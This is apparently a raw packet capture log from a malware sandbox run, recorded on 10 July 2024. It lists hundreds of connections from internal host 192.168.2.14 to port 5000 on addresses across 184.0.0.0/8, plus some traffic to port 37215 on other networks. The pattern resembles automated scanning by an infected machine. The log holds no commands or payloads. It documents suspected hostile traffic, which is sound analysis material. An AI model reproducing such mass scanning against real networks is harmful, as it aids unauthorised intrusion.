                                                    Jul 10, 2024 08:26:10.832751989 CEST500048611184.56.213.60192.168.2.14
                                                    Jul 10, 2024 08:26:10.832765102 CEST500048611184.238.61.157192.168.2.14
                                                    Jul 10, 2024 08:26:10.832775116 CEST500048611184.201.221.148192.168.2.14
                                                    Jul 10, 2024 08:26:10.832784891 CEST500048611184.73.121.219192.168.2.14
                                                    Jul 10, 2024 08:26:10.833616972 CEST500048611184.40.31.160192.168.2.14
                                                    Jul 10, 2024 08:26:10.833630085 CEST500048611184.226.161.30192.168.2.14
                                                    Jul 10, 2024 08:26:10.833638906 CEST500048611184.199.33.230192.168.2.14
                                                    Jul 10, 2024 08:26:10.834342003 CEST486115000192.168.2.14184.186.55.24
                                                    Jul 10, 2024 08:26:10.834342003 CEST486115000192.168.2.14184.49.58.162
                                                    Jul 10, 2024 08:26:10.834342003 CEST486115000192.168.2.14184.182.130.25
                                                    Jul 10, 2024 08:26:10.834342003 CEST486115000192.168.2.14184.19.84.179
                                                    Jul 10, 2024 08:26:10.834342003 CEST486115000192.168.2.14184.241.69.165
                                                    Jul 10, 2024 08:26:10.834342003 CEST486115000192.168.2.14184.108.72.2
                                                    Jul 10, 2024 08:26:10.834342003 CEST486115000192.168.2.14184.129.142.169
                                                    Jul 10, 2024 08:26:10.834342003 CEST486115000192.168.2.14184.229.188.222
                                                    Jul 10, 2024 08:26:10.834486961 CEST500048611184.15.161.244192.168.2.14
                                                    Jul 10, 2024 08:26:10.834500074 CEST500048611184.19.55.39192.168.2.14
                                                    Jul 10, 2024 08:26:10.834510088 CEST500048611184.149.167.97192.168.2.14
                                                    Jul 10, 2024 08:26:10.834518909 CEST500048611184.155.161.45192.168.2.14
                                                    Jul 10, 2024 08:26:10.835345030 CEST500048611184.145.237.72192.168.2.14
                                                    Jul 10, 2024 08:26:10.835359097 CEST500048611184.247.164.123192.168.2.14
                                                    Jul 10, 2024 08:26:10.835367918 CEST500048611184.114.105.43192.168.2.14
                                                    Jul 10, 2024 08:26:10.836168051 CEST500048611184.1.68.34192.168.2.14
                                                    Jul 10, 2024 08:26:10.836180925 CEST500048611184.65.191.19192.168.2.14
                                                    Jul 10, 2024 08:26:10.836190939 CEST500048611184.221.3.183192.168.2.14
                                                    Jul 10, 2024 08:26:10.836199999 CEST500048611184.114.148.247192.168.2.14
                                                    Jul 10, 2024 08:26:10.836586952 CEST486115000192.168.2.14184.0.177.92
                                                    Jul 10, 2024 08:26:10.836586952 CEST486115000192.168.2.14184.14.31.54
                                                    Jul 10, 2024 08:26:10.836586952 CEST486115000192.168.2.14184.105.29.73
                                                    Jul 10, 2024 08:26:10.836586952 CEST486115000192.168.2.14184.248.153.0
                                                    Jul 10, 2024 08:26:10.836586952 CEST486115000192.168.2.14184.134.36.95
                                                    Jul 10, 2024 08:26:10.836586952 CEST4708337215192.168.2.14164.38.164.234
                                                    Jul 10, 2024 08:26:10.836586952 CEST486115000192.168.2.14184.203.16.121
                                                    Jul 10, 2024 08:26:10.836586952 CEST486115000192.168.2.14184.60.250.198
                                                    Jul 10, 2024 08:26:10.836780071 CEST500048611184.187.177.107192.168.2.14
                                                    Jul 10, 2024 08:26:10.836791039 CEST500048611184.54.180.255192.168.2.14
                                                    Jul 10, 2024 08:26:10.836800098 CEST500048611184.171.139.203192.168.2.14
                                                    Jul 10, 2024 08:26:10.837352991 CEST500048611184.4.41.181192.168.2.14
                                                    Jul 10, 2024 08:26:10.837364912 CEST500048611184.40.96.190192.168.2.14
                                                    Jul 10, 2024 08:26:10.837373972 CEST500048611184.142.242.153192.168.2.14
                                                    Jul 10, 2024 08:26:10.837383986 CEST500048611184.12.205.213192.168.2.14
                                                    Jul 10, 2024 08:26:10.837955952 CEST500048611184.41.197.194192.168.2.14
                                                    Jul 10, 2024 08:26:10.837968111 CEST500048611184.101.17.33192.168.2.14
                                                    Jul 10, 2024 08:26:10.837976933 CEST500048611184.60.41.225192.168.2.14
                                                    Jul 10, 2024 08:26:10.837986946 CEST500048611184.170.92.110192.168.2.14
                                                    Jul 10, 2024 08:26:10.839032888 CEST500048611184.187.170.91192.168.2.14
                                                    Jul 10, 2024 08:26:10.839044094 CEST500048611184.184.39.84192.168.2.14
                                                    Jul 10, 2024 08:26:10.839054108 CEST500048611184.118.162.53192.168.2.14
                                                    Jul 10, 2024 08:26:10.839746952 CEST486115000192.168.2.14184.205.149.56
                                                    Jul 10, 2024 08:26:10.839746952 CEST486115000192.168.2.14184.236.32.184
                                                    Jul 10, 2024 08:26:10.839746952 CEST486115000192.168.2.14184.252.32.141
                                                    Jul 10, 2024 08:26:10.839746952 CEST486115000192.168.2.14184.88.91.172
                                                    Jul 10, 2024 08:26:10.839746952 CEST486115000192.168.2.14184.73.223.98
                                                    Jul 10, 2024 08:26:10.839746952 CEST486115000192.168.2.14184.11.252.16
                                                    Jul 10, 2024 08:26:10.839746952 CEST486115000192.168.2.14184.225.130.247
                                                    Jul 10, 2024 08:26:10.839746952 CEST486115000192.168.2.14184.20.155.144
                                                    Jul 10, 2024 08:26:10.839757919 CEST500048611184.81.22.166192.168.2.14
                                                    Jul 10, 2024 08:26:10.839770079 CEST500048611184.151.12.197192.168.2.14
                                                    Jul 10, 2024 08:26:10.839780092 CEST500048611184.138.55.225192.168.2.14
                                                    Jul 10, 2024 08:26:10.839791059 CEST500048611184.221.72.42192.168.2.14
                                                    Jul 10, 2024 08:26:10.840156078 CEST500048611184.235.192.251192.168.2.14
                                                    Jul 10, 2024 08:26:10.840168953 CEST500048611184.198.159.117192.168.2.14
                                                    Jul 10, 2024 08:26:10.840852976 CEST500048611184.186.55.24192.168.2.14
                                                    Jul 10, 2024 08:26:10.840867996 CEST500048611184.14.13.246192.168.2.14
                                                    Jul 10, 2024 08:26:10.840878963 CEST500048611184.109.80.25192.168.2.14
                                                    Jul 10, 2024 08:26:10.840889931 CEST500048611184.49.58.162192.168.2.14
                                                    Jul 10, 2024 08:26:10.841650009 CEST500048611184.180.67.243192.168.2.14
                                                    Jul 10, 2024 08:26:10.841662884 CEST500048611184.50.121.44192.168.2.14
                                                    Jul 10, 2024 08:26:10.841672897 CEST500048611184.118.156.221192.168.2.14
                                                    Jul 10, 2024 08:26:10.841682911 CEST500048611184.130.249.136192.168.2.14
                                                    Jul 10, 2024 08:26:10.842750072 CEST500048611184.11.106.28192.168.2.14
                                                    Jul 10, 2024 08:26:10.842762947 CEST500048611184.82.111.215192.168.2.14
                                                    Jul 10, 2024 08:26:10.842772961 CEST500048611184.201.176.15192.168.2.14
                                                    Jul 10, 2024 08:26:10.842843056 CEST486115000192.168.2.14184.85.183.248
                                                    Jul 10, 2024 08:26:10.842843056 CEST486115000192.168.2.14184.125.250.90
                                                    Jul 10, 2024 08:26:10.842843056 CEST486115000192.168.2.14184.174.204.240
                                                    Jul 10, 2024 08:26:10.842843056 CEST486115000192.168.2.14184.184.255.26
                                                    Jul 10, 2024 08:26:10.842843056 CEST486115000192.168.2.14184.77.191.21
                                                    Jul 10, 2024 08:26:10.842843056 CEST486115000192.168.2.14184.190.136.6
                                                    Jul 10, 2024 08:26:10.842843056 CEST486115000192.168.2.14184.236.117.17
                                                    Jul 10, 2024 08:26:10.842843056 CEST486115000192.168.2.14184.174.75.101
                                                    Jul 10, 2024 08:26:10.843539000 CEST486115000192.168.2.14184.126.102.4
                                                    Jul 10, 2024 08:26:10.843539000 CEST486115000192.168.2.14184.64.110.168
                                                    Jul 10, 2024 08:26:10.843539000 CEST486115000192.168.2.14184.145.61.100
                                                    Jul 10, 2024 08:26:10.843539000 CEST486115000192.168.2.14184.158.128.247
                                                    Jul 10, 2024 08:26:10.843539000 CEST486115000192.168.2.14184.84.92.28
                                                    Jul 10, 2024 08:26:10.843539000 CEST486115000192.168.2.14184.138.236.4
                                                    Jul 10, 2024 08:26:10.843539000 CEST486115000192.168.2.14184.244.40.22
                                                    Jul 10, 2024 08:26:10.843539000 CEST486115000192.168.2.14184.4.238.210
                                                    Jul 10, 2024 08:26:10.843878031 CEST500048611184.128.32.230192.168.2.14
                                                    Jul 10, 2024 08:26:10.843893051 CEST500048611184.89.43.128192.168.2.14
                                                    Jul 10, 2024 08:26:10.843903065 CEST500048611184.41.219.34192.168.2.14
                                                    Jul 10, 2024 08:26:10.843911886 CEST500048611184.196.61.69192.168.2.14
                                                    Jul 10, 2024 08:26:10.844144106 CEST500048611184.131.159.74192.168.2.14
                                                    Jul 10, 2024 08:26:10.844156027 CEST500048611184.16.153.215192.168.2.14
                                                    Jul 10, 2024 08:26:10.844218016 CEST486115000192.168.2.14184.175.150.95
                                                    Jul 10, 2024 08:26:10.844218016 CEST486115000192.168.2.14184.246.98.174
                                                    Jul 10, 2024 08:26:10.844218016 CEST4708337215192.168.2.14113.146.63.134
                                                    Jul 10, 2024 08:26:10.844218016 CEST486115000192.168.2.14184.97.141.93
                                                    Jul 10, 2024 08:26:10.844218016 CEST4708337215192.168.2.1441.110.178.61
                                                    Jul 10, 2024 08:26:10.844218016 CEST486115000192.168.2.14184.94.157.215
                                                    Jul 10, 2024 08:26:10.844218016 CEST486115000192.168.2.14184.164.85.123
                                                    Jul 10, 2024 08:26:10.844218016 CEST486115000192.168.2.14184.238.40.209
                                                    Jul 10, 2024 08:26:10.844389915 CEST486115000192.168.2.14184.196.168.105
                                                    Jul 10, 2024 08:26:10.844389915 CEST486115000192.168.2.14184.136.185.113
                                                    Jul 10, 2024 08:26:10.844389915 CEST486115000192.168.2.14184.155.127.53
                                                    Jul 10, 2024 08:26:10.844389915 CEST486115000192.168.2.14184.31.124.144
                                                    Jul 10, 2024 08:26:10.844389915 CEST486115000192.168.2.14184.17.240.151
                                                    Jul 10, 2024 08:26:10.844389915 CEST486115000192.168.2.14184.40.231.62
                                                    Jul 10, 2024 08:26:10.844389915 CEST486115000192.168.2.14184.243.95.65
                                                    Jul 10, 2024 08:26:10.844389915 CEST486115000192.168.2.14184.243.209.123
                                                    Jul 10, 2024 08:26:10.844948053 CEST500048611184.154.175.230192.168.2.14
                                                    Jul 10, 2024 08:26:10.844960928 CEST500048611184.245.53.237192.168.2.14
                                                    Jul 10, 2024 08:26:10.844970942 CEST500048611184.227.141.153192.168.2.14
                                                    Jul 10, 2024 08:26:10.844980001 CEST500048611184.159.15.202192.168.2.14
                                                    Jul 10, 2024 08:26:10.845587015 CEST486115000192.168.2.14184.121.188.148
                                                    Jul 10, 2024 08:26:10.845587015 CEST486115000192.168.2.14184.195.240.254
                                                    Jul 10, 2024 08:26:10.845587015 CEST486115000192.168.2.14184.81.247.129
                                                    Jul 10, 2024 08:26:10.845587015 CEST486115000192.168.2.14184.168.64.113
                                                    Jul 10, 2024 08:26:10.845587969 CEST486115000192.168.2.14184.172.17.37
                                                    Jul 10, 2024 08:26:10.845587969 CEST4708337215192.168.2.1441.252.69.145
                                                    Jul 10, 2024 08:26:10.845587969 CEST486115000192.168.2.14184.20.165.193
                                                    Jul 10, 2024 08:26:10.845587969 CEST486115000192.168.2.14184.88.167.237
                                                    Jul 10, 2024 08:26:10.845788002 CEST500048611184.205.149.56192.168.2.14
                                                    Jul 10, 2024 08:26:10.845801115 CEST500048611184.92.16.105192.168.2.14
                                                    Jul 10, 2024 08:26:10.845810890 CEST500048611184.182.130.25192.168.2.14
                                                    Jul 10, 2024 08:26:10.845820904 CEST500048611184.0.177.92192.168.2.14
                                                    Jul 10, 2024 08:26:10.846030951 CEST486115000192.168.2.14184.187.244.63
                                                    Jul 10, 2024 08:26:10.846030951 CEST486115000192.168.2.14184.78.182.158
                                                    Jul 10, 2024 08:26:10.846030951 CEST486115000192.168.2.14184.55.51.162
                                                    Jul 10, 2024 08:26:10.846030951 CEST486115000192.168.2.14184.140.201.47
                                                    Jul 10, 2024 08:26:10.846030951 CEST4708337215192.168.2.14157.45.111.206
                                                    Jul 10, 2024 08:26:10.846030951 CEST486115000192.168.2.14184.76.85.245
                                                    Jul 10, 2024 08:26:10.846030951 CEST486115000192.168.2.14184.110.86.138
                                                    Jul 10, 2024 08:26:10.846030951 CEST486115000192.168.2.14184.102.188.67
                                                    Jul 10, 2024 08:26:10.846703053 CEST500048611184.143.218.164192.168.2.14
                                                    Jul 10, 2024 08:26:10.846716881 CEST500048611184.211.50.137192.168.2.14
                                                    Jul 10, 2024 08:26:10.846726894 CEST500048611184.19.84.179192.168.2.14
                                                    Jul 10, 2024 08:26:10.847640991 CEST500048611184.74.48.69192.168.2.14
                                                    Jul 10, 2024 08:26:10.847652912 CEST500048611184.241.69.165192.168.2.14
                                                    Jul 10, 2024 08:26:10.847664118 CEST500048611184.110.83.73192.168.2.14
                                                    Jul 10, 2024 08:26:10.847675085 CEST500048611184.175.4.140192.168.2.14
                                                    Jul 10, 2024 08:26:10.848149061 CEST500048611184.127.114.88192.168.2.14
                                                    Jul 10, 2024 08:26:10.848160028 CEST500048611184.108.72.2192.168.2.14
                                                    Jul 10, 2024 08:26:10.848728895 CEST500048611184.14.31.54192.168.2.14
                                                    Jul 10, 2024 08:26:10.848748922 CEST500048611184.49.19.123192.168.2.14
                                                    Jul 10, 2024 08:26:10.848758936 CEST500048611184.124.195.160192.168.2.14
                                                    Jul 10, 2024 08:26:10.848767042 CEST500048611184.204.245.242192.168.2.14
                                                    Jul 10, 2024 08:26:10.849606037 CEST500048611184.130.156.144192.168.2.14
                                                    Jul 10, 2024 08:26:10.849618912 CEST500048611184.85.183.248192.168.2.14
                                                    Jul 10, 2024 08:26:10.849628925 CEST500048611184.129.142.169192.168.2.14
                                                    Jul 10, 2024 08:26:10.850349903 CEST500048611184.126.102.4192.168.2.14
                                                    Jul 10, 2024 08:26:10.850363016 CEST500048611184.125.250.90192.168.2.14
                                                    Jul 10, 2024 08:26:10.850374937 CEST500048611184.105.29.73192.168.2.14
                                                    Jul 10, 2024 08:26:10.850383997 CEST500048611184.229.188.222192.168.2.14
                                                    Jul 10, 2024 08:26:10.851264000 CEST500048611184.248.153.0192.168.2.14
                                                    Jul 10, 2024 08:26:10.851274967 CEST500048611184.215.149.192192.168.2.14
                                                    Jul 10, 2024 08:26:10.851284981 CEST500048611184.175.150.95192.168.2.14
                                                    Jul 10, 2024 08:26:10.851296902 CEST500048611184.187.244.63192.168.2.14
                                                    Jul 10, 2024 08:26:10.852147102 CEST500048611184.236.32.184192.168.2.14
                                                    Jul 10, 2024 08:26:10.852157116 CEST500048611184.196.168.105192.168.2.14
                                                    Jul 10, 2024 08:26:10.852617979 CEST4708337215192.168.2.1441.174.50.70
                                                    Jul 10, 2024 08:26:10.852618933 CEST486115000192.168.2.14184.241.155.66
                                                    Jul 10, 2024 08:26:10.852618933 CEST486115000192.168.2.14184.185.200.176
                                                    Jul 10, 2024 08:26:10.852618933 CEST486115000192.168.2.14184.68.255.202
                                                    Jul 10, 2024 08:26:10.852618933 CEST486115000192.168.2.14184.156.65.236
                                                    Jul 10, 2024 08:26:10.852618933 CEST486115000192.168.2.14184.165.117.110
                                                    Jul 10, 2024 08:26:10.852618933 CEST486115000192.168.2.14184.189.71.5
                                                    Jul 10, 2024 08:26:10.852618933 CEST486115000192.168.2.14184.20.189.241
                                                    Jul 10, 2024 08:26:10.852773905 CEST500048611184.246.98.174192.168.2.14
                                                    Jul 10, 2024 08:26:10.852786064 CEST500048611184.64.110.168192.168.2.14
                                                    Jul 10, 2024 08:26:10.852796078 CEST500048611184.134.36.95192.168.2.14
                                                    Jul 10, 2024 08:26:10.852806091 CEST500048611184.174.204.240192.168.2.14
                                                    Jul 10, 2024 08:26:10.853391886 CEST500048611184.252.32.141192.168.2.14
                                                    Jul 10, 2024 08:26:10.853403091 CEST500048611184.136.185.113192.168.2.14
                                                    Jul 10, 2024 08:26:10.853411913 CEST500048611184.145.61.100192.168.2.14
                                                    Jul 10, 2024 08:26:10.853660107 CEST486115000192.168.2.14184.15.232.221
                                                    Jul 10, 2024 08:26:10.853660107 CEST486115000192.168.2.14184.117.97.144
                                                    Jul 10, 2024 08:26:10.853660107 CEST486115000192.168.2.14184.129.152.206
                                                    Jul 10, 2024 08:26:10.853660107 CEST486115000192.168.2.14184.250.55.38
                                                    Jul 10, 2024 08:26:10.853660107 CEST486115000192.168.2.14184.80.129.121
                                                    Jul 10, 2024 08:26:10.853660107 CEST486115000192.168.2.14184.52.213.125
                                                    Jul 10, 2024 08:26:10.853660107 CEST486115000192.168.2.14184.120.5.23
                                                    Jul 10, 2024 08:26:10.853660107 CEST486115000192.168.2.14184.55.43.111
                                                    Jul 10, 2024 08:26:10.854161024 CEST486115000192.168.2.14184.182.98.210
                                                    Jul 10, 2024 08:26:10.854161024 CEST486115000192.168.2.14184.57.230.26
                                                    Jul 10, 2024 08:26:10.854161024 CEST486115000192.168.2.14184.191.249.228
                                                    Jul 10, 2024 08:26:10.854161024 CEST486115000192.168.2.14184.154.57.15
                                                    Jul 10, 2024 08:26:10.854161024 CEST486115000192.168.2.14184.246.41.194
                                                    Jul 10, 2024 08:26:10.854161024 CEST486115000192.168.2.14184.111.158.219
                                                    Jul 10, 2024 08:26:10.854161024 CEST486115000192.168.2.14184.140.148.250
                                                    Jul 10, 2024 08:26:10.854161024 CEST486115000192.168.2.14184.30.1.5
                                                    Jul 10, 2024 08:26:10.854238033 CEST500048611184.184.255.26192.168.2.14
                                                    Jul 10, 2024 08:26:10.854250908 CEST500048611184.121.188.148192.168.2.14
                                                    Jul 10, 2024 08:26:10.854259968 CEST500048611184.78.182.158192.168.2.14
                                                    Jul 10, 2024 08:26:10.854327917 CEST486115000192.168.2.14184.72.186.203
                                                    Jul 10, 2024 08:26:10.854329109 CEST486115000192.168.2.14184.140.194.54
                                                    Jul 10, 2024 08:26:10.854329109 CEST486115000192.168.2.14184.117.146.139
                                                    Jul 10, 2024 08:26:10.854329109 CEST486115000192.168.2.14184.56.214.254
                                                    Jul 10, 2024 08:26:10.854329109 CEST486115000192.168.2.14184.34.7.104
                                                    Jul 10, 2024 08:26:10.854329109 CEST486115000192.168.2.14184.197.119.139
                                                    Jul 10, 2024 08:26:10.854329109 CEST486115000192.168.2.14184.1.70.31
                                                    Jul 10, 2024 08:26:10.854329109 CEST486115000192.168.2.14184.47.135.172
                                                    Jul 10, 2024 08:26:10.854561090 CEST500048611184.155.127.53192.168.2.14
                                                    Jul 10, 2024 08:26:10.854573965 CEST500048611184.77.191.21192.168.2.14
                                                    Jul 10, 2024 08:26:10.854583979 CEST500048611184.158.128.247192.168.2.14
                                                    Jul 10, 2024 08:26:10.855540991 CEST500048611184.55.51.162192.168.2.14
                                                    Jul 10, 2024 08:26:10.855552912 CEST500048611184.88.91.172192.168.2.14
                                                    Jul 10, 2024 08:26:10.855564117 CEST500048611184.140.201.47192.168.2.14
                                                    Jul 10, 2024 08:26:10.855664015 CEST486115000192.168.2.14184.159.23.239
                                                    Jul 10, 2024 08:26:10.855664015 CEST486115000192.168.2.14184.55.37.158
                                                    Jul 10, 2024 08:26:10.855664015 CEST486115000192.168.2.14184.193.92.188
                                                    Jul 10, 2024 08:26:10.855664015 CEST486115000192.168.2.14184.39.87.176
                                                    Jul 10, 2024 08:26:10.855664015 CEST486115000192.168.2.14184.189.93.31
                                                    Jul 10, 2024 08:26:10.855664015 CEST486115000192.168.2.14184.201.250.238
                                                    Jul 10, 2024 08:26:10.855664015 CEST486115000192.168.2.14184.141.62.194
                                                    Jul 10, 2024 08:26:10.855664015 CEST486115000192.168.2.14184.183.240.84
                                                    Jul 10, 2024 08:26:10.856151104 CEST500048611184.31.124.144192.168.2.14
                                                    Jul 10, 2024 08:26:10.856163025 CEST500048611184.73.223.98192.168.2.14
                                                    Jul 10, 2024 08:26:10.856596947 CEST500048611184.84.92.28192.168.2.14
                                                    Jul 10, 2024 08:26:10.856616020 CEST500048611184.190.136.6192.168.2.14
                                                    Jul 10, 2024 08:26:10.856626034 CEST500048611184.138.236.4192.168.2.14
                                                    Jul 10, 2024 08:26:10.857238054 CEST500048611184.11.252.16192.168.2.14
                                                    Jul 10, 2024 08:26:10.857250929 CEST500048611184.236.117.17192.168.2.14
                                                    Jul 10, 2024 08:26:10.857261896 CEST500048611184.244.40.22192.168.2.14
                                                    Jul 10, 2024 08:26:10.858309031 CEST500048611184.225.130.247192.168.2.14
                                                    Jul 10, 2024 08:26:10.858326912 CEST500048611184.174.75.101192.168.2.14
                                                    Jul 10, 2024 08:26:10.858884096 CEST500048611184.20.155.144192.168.2.14
                                                    Jul 10, 2024 08:26:10.858903885 CEST500048611184.241.155.66192.168.2.14
                                                    Jul 10, 2024 08:26:10.858912945 CEST500048611184.203.16.121192.168.2.14
                                                    Jul 10, 2024 08:26:10.859184980 CEST486115000192.168.2.14184.107.175.168
                                                    Jul 10, 2024 08:26:10.859184980 CEST486115000192.168.2.14184.181.238.111
                                                    Jul 10, 2024 08:26:10.859184980 CEST486115000192.168.2.14184.205.99.198
                                                    Jul 10, 2024 08:26:10.859184980 CEST486115000192.168.2.14184.247.170.43
                                                    Jul 10, 2024 08:26:10.859184980 CEST486115000192.168.2.14184.39.209.39
                                                    Jul 10, 2024 08:26:10.859184980 CEST486115000192.168.2.14184.73.14.75
                                                    Jul 10, 2024 08:26:10.859184980 CEST486115000192.168.2.14184.22.112.111
                                                    Jul 10, 2024 08:26:10.859184980 CEST486115000192.168.2.14184.69.42.219
                                                    Jul 10, 2024 08:26:10.859370947 CEST486115000192.168.2.14184.129.165.234
                                                    Jul 10, 2024 08:26:10.859370947 CEST4708337215192.168.2.1441.218.65.39
                                                    Jul 10, 2024 08:26:10.859370947 CEST486115000192.168.2.14184.24.164.24
                                                    Jul 10, 2024 08:26:10.859370947 CEST486115000192.168.2.14184.19.253.109
                                                    Jul 10, 2024 08:26:10.859370947 CEST486115000192.168.2.14184.171.154.177
                                                    Jul 10, 2024 08:26:10.859370947 CEST486115000192.168.2.14184.212.176.106
                                                    Jul 10, 2024 08:26:10.859370947 CEST486115000192.168.2.14184.27.189.134
                                                    Jul 10, 2024 08:26:10.859370947 CEST486115000192.168.2.14184.202.87.157
                                                    Jul 10, 2024 08:26:10.859994888 CEST500048611184.4.238.210192.168.2.14
                                                    Jul 10, 2024 08:26:10.860008955 CEST500048611184.60.250.198192.168.2.14
                                                    Jul 10, 2024 08:26:10.860018969 CEST500048611184.17.240.151192.168.2.14
                                                    Jul 10, 2024 08:26:10.860029936 CEST500048611184.76.85.245192.168.2.14
                                                    Jul 10, 2024 08:26:10.860141993 CEST500048611184.97.141.93192.168.2.14
                                                    Jul 10, 2024 08:26:10.860742092 CEST500048611184.110.86.138192.168.2.14
                                                    Jul 10, 2024 08:26:10.860753059 CEST500048611184.102.188.67192.168.2.14
                                                    Jul 10, 2024 08:26:10.860761881 CEST500048611184.40.231.62192.168.2.14
                                                    Jul 10, 2024 08:26:10.861941099 CEST500048611184.195.240.254192.168.2.14
                                                    Jul 10, 2024 08:26:10.861953020 CEST500048611184.94.157.215192.168.2.14
                                                    Jul 10, 2024 08:26:10.861962080 CEST500048611184.72.186.203192.168.2.14
                                                    Jul 10, 2024 08:26:10.861973047 CEST500048611184.81.247.129192.168.2.14
                                                    Jul 10, 2024 08:26:10.861983061 CEST500048611184.185.200.176192.168.2.14
                                                    Jul 10, 2024 08:26:10.862931967 CEST500048611184.164.85.123192.168.2.14
                                                    Jul 10, 2024 08:26:10.862945080 CEST500048611184.159.23.239192.168.2.14
                                                    Jul 10, 2024 08:26:10.862955093 CEST500048611184.182.98.210192.168.2.14
                                                    Jul 10, 2024 08:26:10.863650084 CEST500048611184.68.255.202192.168.2.14
                                                    Jul 10, 2024 08:26:10.863662004 CEST500048611184.168.64.113192.168.2.14
                                                    Jul 10, 2024 08:26:10.863670111 CEST500048611184.55.37.158192.168.2.14
                                                    Jul 10, 2024 08:26:10.863678932 CEST500048611184.243.95.65192.168.2.14
                                                    Jul 10, 2024 08:26:10.864146948 CEST500048611184.238.40.209192.168.2.14
                                                    Jul 10, 2024 08:26:10.864789009 CEST500048611184.243.209.123192.168.2.14
                                                    Jul 10, 2024 08:26:10.864800930 CEST500048611184.57.230.26192.168.2.14
                                                    Jul 10, 2024 08:26:10.864816904 CEST500048611184.156.65.236192.168.2.14
                                                    Jul 10, 2024 08:26:10.864826918 CEST500048611184.15.232.221192.168.2.14
                                                    Jul 10, 2024 08:26:10.865566015 CEST500048611184.191.249.228192.168.2.14
                                                    Jul 10, 2024 08:26:10.865578890 CEST500048611184.140.194.54192.168.2.14
                                                    Jul 10, 2024 08:26:10.865588903 CEST500048611184.117.97.144192.168.2.14
                                                    Jul 10, 2024 08:26:10.865597963 CEST500048611184.129.165.234192.168.2.14
                                                    Jul 10, 2024 08:26:10.865927935 CEST486115000192.168.2.14184.246.77.254
                                                    Jul 10, 2024 08:26:10.865927935 CEST486115000192.168.2.14184.179.145.17
                                                    Jul 10, 2024 08:26:10.865927935 CEST486115000192.168.2.14184.43.194.68
                                                    Jul 10, 2024 08:26:10.865927935 CEST486115000192.168.2.14184.42.133.71
                                                    Jul 10, 2024 08:26:10.865927935 CEST486115000192.168.2.14184.15.62.146
                                                    Jul 10, 2024 08:26:10.865927935 CEST486115000192.168.2.14184.74.36.104
                                                    Jul 10, 2024 08:26:10.865927935 CEST486115000192.168.2.14184.168.227.106
                                                    Jul 10, 2024 08:26:10.865928888 CEST486115000192.168.2.14184.78.151.22
                                                    Jul 10, 2024 08:26:10.866334915 CEST500048611184.129.152.206192.168.2.14
                                                    Jul 10, 2024 08:26:10.866348028 CEST500048611184.165.117.110192.168.2.14
                                                    Jul 10, 2024 08:26:10.866357088 CEST500048611184.117.146.139192.168.2.14
                                                    Jul 10, 2024 08:26:10.866365910 CEST500048611184.250.55.38192.168.2.14
                                                    Jul 10, 2024 08:26:10.867376089 CEST500048611184.154.57.15192.168.2.14
                                                    Jul 10, 2024 08:26:10.867389917 CEST500048611184.80.129.121192.168.2.14
                                                    Jul 10, 2024 08:26:10.867398977 CEST500048611184.193.92.188192.168.2.14
                                                    Jul 10, 2024 08:26:10.867408991 CEST500048611184.107.175.168192.168.2.14
                                                    Jul 10, 2024 08:26:10.867594957 CEST486115000192.168.2.14184.90.179.132
                                                    Jul 10, 2024 08:26:10.867594957 CEST486115000192.168.2.14184.245.82.206
                                                    Jul 10, 2024 08:26:10.867594957 CEST486115000192.168.2.14184.233.61.223
                                                    Jul 10, 2024 08:26:10.867594957 CEST486115000192.168.2.14184.188.229.36
                                                    Jul 10, 2024 08:26:10.867594957 CEST486115000192.168.2.14184.2.213.111
                                                    Jul 10, 2024 08:26:10.867594957 CEST486115000192.168.2.14184.148.238.207
                                                    Jul 10, 2024 08:26:10.867594957 CEST486115000192.168.2.14184.4.210.116
                                                    Jul 10, 2024 08:26:10.867594957 CEST486115000192.168.2.14184.63.55.120
                                                    Jul 10, 2024 08:26:10.868161917 CEST500048611184.172.17.37192.168.2.14
                                                    Jul 10, 2024 08:26:10.868174076 CEST500048611184.181.238.111192.168.2.14
                                                    Jul 10, 2024 08:26:10.868874073 CEST500048611184.205.99.198192.168.2.14
                                                    Jul 10, 2024 08:26:10.868885994 CEST500048611184.24.164.24192.168.2.14
                                                    Jul 10, 2024 08:26:10.868896961 CEST500048611184.247.170.43192.168.2.14
                                                    Jul 10, 2024 08:26:10.869626999 CEST486115000192.168.2.14184.56.94.204
                                                    Jul 10, 2024 08:26:10.869626999 CEST486115000192.168.2.14184.63.196.213
                                                    Jul 10, 2024 08:26:10.869626999 CEST486115000192.168.2.14184.77.51.93
                                                    Jul 10, 2024 08:26:10.869626999 CEST486115000192.168.2.14184.243.129.172
                                                    Jul 10, 2024 08:26:10.869626999 CEST486115000192.168.2.14184.196.119.56
                                                    Jul 10, 2024 08:26:10.869626999 CEST486115000192.168.2.14184.220.145.206
                                                    Jul 10, 2024 08:26:10.869626999 CEST486115000192.168.2.14184.185.248.150
                                                    Jul 10, 2024 08:26:10.869626999 CEST486115000192.168.2.14184.180.247.65
                                                    Jul 10, 2024 08:26:10.870064974 CEST500048611184.39.87.176192.168.2.14
                                                    Jul 10, 2024 08:26:10.870079041 CEST500048611184.56.214.254192.168.2.14
                                                    Jul 10, 2024 08:26:10.870089054 CEST500048611184.20.165.193192.168.2.14
                                                    Jul 10, 2024 08:26:10.870945930 CEST500048611184.189.71.5192.168.2.14
                                                    Jul 10, 2024 08:26:10.870958090 CEST500048611184.246.41.194192.168.2.14
                                                    Jul 10, 2024 08:26:10.870966911 CEST500048611184.88.167.237192.168.2.14
                                                    Jul 10, 2024 08:26:10.870976925 CEST500048611184.19.253.109192.168.2.14
                                                    Jul 10, 2024 08:26:10.872073889 CEST486115000192.168.2.14184.86.243.127
                                                    Jul 10, 2024 08:26:10.872073889 CEST486115000192.168.2.14184.212.109.180
                                                    Jul 10, 2024 08:26:10.872073889 CEST486115000192.168.2.14184.23.192.76
                                                    Jul 10, 2024 08:26:10.872073889 CEST486115000192.168.2.14184.17.126.121
                                                    Jul 10, 2024 08:26:10.872073889 CEST486115000192.168.2.14184.130.9.207
                                                    Jul 10, 2024 08:26:10.872073889 CEST486115000192.168.2.14184.212.193.77
                                                    Jul 10, 2024 08:26:10.872073889 CEST486115000192.168.2.14184.167.248.207
                                                    Jul 10, 2024 08:26:10.872073889 CEST486115000192.168.2.14184.139.180.27
                                                    Jul 10, 2024 08:26:10.872153997 CEST500048611184.246.77.254192.168.2.14
                                                    Jul 10, 2024 08:26:10.872165918 CEST500048611184.111.158.219192.168.2.14
                                                    Jul 10, 2024 08:26:10.872175932 CEST500048611184.39.209.39192.168.2.14
                                                    Jul 10, 2024 08:26:10.872185946 CEST500048611184.34.7.104192.168.2.14
                                                    Jul 10, 2024 08:26:10.873111963 CEST486115000192.168.2.14184.156.184.45
                                                    Jul 10, 2024 08:26:10.873111963 CEST486115000192.168.2.14184.61.123.15
